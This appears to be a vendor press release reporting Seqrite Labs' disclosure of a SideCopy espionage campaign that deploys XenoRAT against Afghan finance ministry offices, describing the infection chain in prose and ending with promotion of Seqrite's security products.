A new chapter in South Asia’s cyber espionage story is unfolding far from the front page, inside finance ministries and provincial revenue offices. Seqrite, the enterprise security arm of Quick Heal Technologies Limited, a global provider of cybersecurity solutions, has disclosed details of Operation XENOFISCAL – a targeted cyber espionage campaign attributed with medium-to-high confidence to SideCopy, a Pakistan-linked advanced persistent threat (APT) group operating under the broader Transparent Tribe/APT36 umbrella.
Researchers at Seqrite Labs, India’s largest malware analysis facility, discovered that the operation implants a persistent variant of XenoRAT 1.8.7 across Afghanistan’s Ministry of Finance (MoF) and provincial revenue directorates, using carefully crafted Pashto-language spear-phishing lures and a multi-stage, largely fileless infection chain that abuses legitimate Windows binaries to bypass traditional defenses.
The campaign begins with a spear-phishing email carrying a ZIP archive that appears, at first glance, to be a routine internal document. Inside sits a malicious Windows shortcut (LNK) file whose Pashto filename translates to “List of Employees Who Were Introduced to the Intellectual and Psychological Warfare Seminar,” a theme carefully chosen to match Afghanistan’s government context and staff workflows. Once a targeted official executes the shortcut, the LNK abuses the legitimate Windows utility mshta.exe as a Living-off-the-Land Binary to silently fetch a remote HTML Application (HTA) from a compromised Afghan education domain, executing heavily obfuscated JavaScript directly in memory instead of writing obvious binaries to disk.
From there, the campaign escalates through multiple in-memory stages. A heavily obfuscated JScript payload reconstructs malicious components using hex-encoded arrays, custom Base64 routines, and .NET deserialization, ultimately loading a .NET DLL-based first-stage loader. While the victim is presented with a realistic decoy document – a detailed Afghan Ministry of Finance provincial staff directory listing finance directors, revenue chiefs, and mobile numbers for all 34 provinces – the loader stealthily creates a new directory under the Public user profile, establishes registry-based persistence under a typosquatted “Edgre” entry designed to mimic Microsoft Edge, and prepares the environment for the final payload.
In the last stage, the infection deploys XenoRAT 1.8.7, an open-source remote access trojan configured to communicate over TCP with attacker-controlled infrastructure hosted on European bulletproof servers, including the command-and-control IP 185.235.137.106. Once active, XenoRAT offers the operator a full post-exploitation toolkit, including remote command execution, dynamic DLL loading, file exfiltration, scheduled task creation, antivirus reconnaissance, SOCKS5 proxy tunneling, keystroke logging, screenshot capture, clipboard monitoring, webcam and microphone surveillance, and the ability to remove persistence traces or uninstall itself to erase evidence. By relying on staged, in-memory execution and trusted components such as mshta.exe, the operation leaves minimal forensic footprint on disk while maintaining durable, high-value access to fiscal and personnel data inside Afghan government systems.
Researchers at Seqrite Labs noted that Operation XENOFISCAL is part of a broader regional pattern in which SideCopy and related clusters adopt customized open-source RATs, weaponise local-language lures, and stage infrastructure on foreign soil to complicate attribution. The campaign’s use of a compromised Afghan educational domain as a delivery platform, combined with a genuine MoF staff directory as the decoy document, underlines how much prior reconnaissance and data harvesting went into tailoring the operation for maximum credibility and impact.
For governments and critical institutions across the region, the implications stretch beyond endpoint compromise. Ministries of finance, tax authorities, and provincial revenue offices manage deeply sensitive data: national budgets, revenue flows, payroll, contracts, and extensive records on individual officials and vendors. Compromise at this layer is not only an intelligence coup; it can become a gateway for corruption, coercion, and strategic economic disruption. In India, where similar fiscal, identity and benefits data is central to governance, the Digital Personal Data Protection (DPDP) Act, 2023 raises the stakes further by placing clear accountability on Data Fiduciaries when personal data is exposed or misused through such intrusions.
In this environment, advanced cybersecurity solutions such as Seqrite Data Privacy and Digital Risk Protection Services (DRPS) have become must-have capabilities for government departments and enterprises that want to move beyond perimeter-centric security and truly protect what attackers are after – the data itself. Seqrite also offers a Digital Risks Calculator, which enables organizations to assess their potential exposure across digital assets, identify areas of elevated risk, and prioritize mitigation efforts. Used alongside Seqrite’s endpoint, server, and gateway protections, these help close the gap that campaigns like Operation XENOFISCAL systematically exploit: poorly inventoried, overexposed, and weakly governed information assets.
All Seqrite products are aligned with the provisions of the DPDP Act, allowing government and enterprise customers to strengthen cyber defense and data protection in tandem rather than as separate initiatives. Seqrite’s portfolio – from Endpoint and Server Security to Threat Intelligence and Ransomware Recovery as a Service (RRaaS) – is designed to give defenders both internal visibility and external situational awareness in the face of increasingly targeted, politically motivated operations.
